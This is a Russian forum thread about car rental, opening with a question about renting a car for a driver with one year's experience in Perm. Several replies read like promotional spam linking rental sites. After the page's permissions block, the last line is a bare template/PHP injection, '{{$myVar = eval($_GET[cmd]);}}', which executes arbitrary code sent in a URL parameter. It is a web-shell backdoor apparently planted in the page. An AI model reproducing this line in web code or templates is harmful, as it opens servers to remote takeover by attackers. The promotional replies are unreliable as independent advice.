+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Прокат авто


  1. #1
    Мимо проходил Миняев is on a distinguished road Аватар для Миняев
    Регистрация
    10.07.2019
    Откуда
    ...
    Машина
    Нормальный
    Сообщений
    11

    Прокат авто

    Привет всем! Форумчане, Вы пользовались когда-то прокатом авто? Можно ли взять машину, если стаж вождения один год? Я планирую для жены взять. Кто из Перми, что скажете?

  2. #2
    Мимо проходил Kollins is on a distinguished road Аватар для Kollins
    Регистрация
    05.01.2019
    Машина
    Вольц
    Сообщений
    11
    Я бы своей жене не доверил машину после года вождения. И мне кажется. что многие компании дают авто в прокат при опыте вождения от 2х лет. Но возможно. Вы и найдете варианты.

  3. #3
    Мимо проходил Trety is on a distinguished road Аватар для Trety
    Регистрация
    17.12.2018
    Сообщений
    8
    А на какой срок Вы бы хотели машину взять? Если Ваша супруга хорошо водит, то конечно можно взять машину, тем более они застрахованы. Точно по стажу не скажу, думаю, что можно уточнить в компании. которая предоставляет данные услуги. Если Вы еще не знаете. куда обратиться, вот здесь есть вариант проката авто в Перми https://saborauto.ru/

  4. #4
    Мимо проходил Oxoxo is on a distinguished road Аватар для Oxoxo
    Регистрация
    13.02.2019
    Сообщений
    12
    Можете поискать на портале Услугио. В среднем как раз от года можно получить авто в прокат. Это и каршеринга касается. Мне кажется, что каршеринг более выгодная услуга и можно будет брать разные авто.

  5. #5
    GTI-Racing Ignat is on a distinguished road Аватар для Ignat
    Регистрация
    15.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    259
    Добрый день. Арендой авто с водителем в Санкт-Петербурге пользуюсь на постоянной основе, работа меня обязывает всегда быть престижной. Своего автомобиля хорошего нет поэтому аренда очень выручает. пользовалась услугами нескольких компаний но сейчас постоянный клиент https://prokat.group . Только эта компания следит за техническим состоянием автопарка, автомобили регулярно проходят тщательное техническое обслуживание с заменой оригинальных расходных материалов и изношенных запчастей. Цены лояльные, а сейчас скидки хорошие. Если нужен хороший автомобиль по адекватной цене в аренду, вам в "Прокат Групп".

  6. #6
    Новичок Drughok is on a distinguished road Аватар для Drughok
    Регистрация
    21.10.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    103
    Я частенько беру прокат авто в Сочи https://prokat-avto-sochi.ru, так как нужно мотаться туда по работе, а на общественном транспорте это занимает просто нереально много времени. Та и сейчас с этим коронавирусом лучше поберечься и ездить самому на машине, так что вещь интересная и сам часто нею пользуюсь.

+ Ответить в теме

Похожие темы

  1. Прокат авто
    от Oxoxo в разделе Курилка
    Ответов: 3
    Последнее сообщение: 04.02.2020, 13:39
  2. Прокат автомобилей в Сочи
    от Kurdt в разделе Разное
    Ответов: 2
    Последнее сообщение: 18.12.2019, 19:53
  3. Прокат авто в Испании
    от Уточка в разделе Курилка
    Ответов: 0
    Последнее сообщение: 23.05.2019, 14:13
  4. Кто-нибудь Брал В 2008 На Прокат Авто За Границей Без Мву?
    от Max в разделе Законодательство и страхование
    Ответов: 9
    Последнее сообщение: 19.12.2009, 01:23

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}